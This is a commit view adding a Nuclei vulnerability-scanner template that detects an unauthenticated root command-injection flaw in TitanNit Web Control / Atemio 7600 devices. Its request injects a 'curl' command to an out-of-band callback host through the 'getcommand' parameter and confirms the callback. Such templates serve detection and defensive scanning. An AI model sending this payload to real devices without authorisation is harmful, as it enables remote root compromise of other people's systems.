Merge pull request #9625 from projectdiscovery/titannit-web-ssrf

Create titannit-web-ssrf.yaml
patch-1
Ritik Chaddha 2024-04-23 19:03:10 +05:30 committed by GitHub
commit 87728551f1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: titannit-web-rce
info:
name: TitanNit Web Control 2.01/Atemio 7600 Root - Remote Code Execution
author: DhiyaneshDk
severity: high
description: |
The vulnerability in the device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application,allowing the attacker to gain root access.
reference:
- https://www.exploit-db.com/exploits/51853
- https://github.com/projectdiscovery/nuclei-templates/issues/8716
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
metadata:
verified: true
max-request: 1
fofa-query: title="TitanNit Web Control"
tags: titanit,web-control,ssrf,oast,rce
http:
- raw:
- |
@timeout: 20s
GET /query?getcommand=&cmd=curl+http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: body
words:
- "titan.css"